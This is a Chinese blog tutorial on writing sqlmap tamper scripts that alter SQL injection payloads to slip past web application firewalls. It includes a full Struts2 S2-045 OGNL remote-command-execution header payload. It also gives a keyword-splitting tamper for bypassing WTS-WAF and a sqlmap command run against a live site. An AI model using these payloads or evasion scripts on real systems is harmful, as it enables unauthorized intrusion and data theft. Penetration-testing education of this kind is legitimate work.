SQLMap tamper编写

简介

sqlmap是一个自动化的SQL注入工具，而tamper则是对其进行扩展的一系列脚本，主要功能是对本来的payload进行特定的更改以绕过waf/ids

可以理解为，sqlmap在对漏洞网站自动化注入的时候，如果我们使用了tamper脚本，sqlmap的每个payload都会经过tamper这个包装车间的加工，然后再进行投递。

当我们使用网上公开的tamper时，这个tamper是怎么实现的我们不需要知道，只需要按照使用说明使用即可，但渗透测试中环境千变万化，我们总会遇到需要自己编写tamper的场景，这也是本文的重点

使用方法

sqlmap.py XXXXX -tamper "模块名"

sqlmap的tamper目录下有一些简单的tamper脚本，可以进行简单绕过

tamper结构简述

以escapequotes.py这个tamper文件为例

见名知义，该tamper是用来转义的，将单引号转换成\\'，双引号转换成 \\"

代码如下：

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Slash escape single and double quotes (e.g. ' -> \')

    >>> tamper('1" AND SLEEP(5)#')
    '1\\\\" AND SLEEP(5)#'
    """

    return payload.replace("'", "\\'").replace('"', '\\"')

简单解释一下结构

__priority__ 是当前脚本调用优先等级，该优先级用于使用多个tamper时的执行顺序选择

在自带的tamper脚本中一共有以下几种优先级，还可以自定义-100~100

__priority__ = PRIORITY.LOWEST
__priority__ = PRIORITY.LOWER
__priority__ = PRIORITY.LOW
__priority__ = PRIORITY.NORMAL
__priority__ = PRIORITY.HIGH
__priority__ = PRIORITY.HIGHER
__priority__ = PRIORITY.HIGHEST

dependencies函数声明该脚本适用或不适用的范围，可以为空，例如：

import os
from lib.core.common import singleTimeWarnMessage

def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS))
# singleTimeWarnMessage() 用于在控制台中打印出警告信息

tamper是主要的函数，接受的参数为payload和**kwargs，返回值为替换后的payload

这里可以看出返回的是使用了python字符串替换函数replace，将字符串中的单引号和双引号进行转义

payload.replace("'", "\\'").replace('"', '\\"')

而tamper函数不仅有payload参数，还有可变长参数**kwargs

def tamper(payload, **kwargs)

kwargs是一个字典，我们输出出来看一下

def tamper(payload, **kwargs):
    print(kwargs)
    return payload

其结构为

{'headers': {}, 'delimiter': '&', 'hints': {}}

这里的kwargs['headers']很明显是我们的请求头，我们可以对其进行自定义

如倾旋师傅提到这样来执行s2-45

kwargs['headers']['Content-type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+sys.argv[2]+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

kwargs['headers']['User-Agent']="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" # 修改User-Agent

当然我们可以进行更多的自定义

编写一个简单的 bypass WTS-WAF tamper

了解了结构和说明之后，我们来编写一个bypass wts-waf 的 tamper 脚本，思路就跟之前提到的这里相同，只是将其关键字中间添加了%号：https://www.cnblogs.com/Cl0ud/p/14345881.html

目标站点是asp+Access，装着不知名版本的wts-waf

我们使用sqlmap证明漏洞存在，tamper内容为

'''
    test bypass WTS-WAF
'''

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload=payload.lower()
    payload=payload.replace('and','an%d')
    payload=payload.replace('select','sel%ect')
    payload=payload.replace('union','un%ion')
    payload=payload.replace('sleep','sl%eep')
    payload=payload.replace('or','o%r')
    payload=payload.replace('between','bet%ween')
    return payload

输入命令

sqlmap.py -u http://漏洞URL?class=16 --tamper=wts_waf -v 3

这里的-v 3是为了看到payload

它共有七个等级，默认为1：

• 0、只显示python错误以及严重的信息。
• 1、同时显示基本信息和警告信息。（默认）
• 2、同时显示debug信息。
• 3、同时显示注入的payload。
• 4、同时显示HTTP请求。
• 5、同时显示HTTP响应头。
• 6、同时显示HTTP响应页面。

可以看到这里payload中的关键字成功被加工

证明漏洞存在

想要通过注入点获取数据和进一步操作需要在简易版tamper的基础上再进行修改，比如禁用函数关键字的绕过等等，下次再写，另外会写一些绕过最新WAF的文章 ：)

参考链接

• https://payloads.online/archivers/2017-06-08/1
• https://www.smi1e.top/sqlmap-tamper编写/

__EOF__

本文作者：春告鳥
本文链接：https://www.cnblogs.com/Cl0ud/p/14394627.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！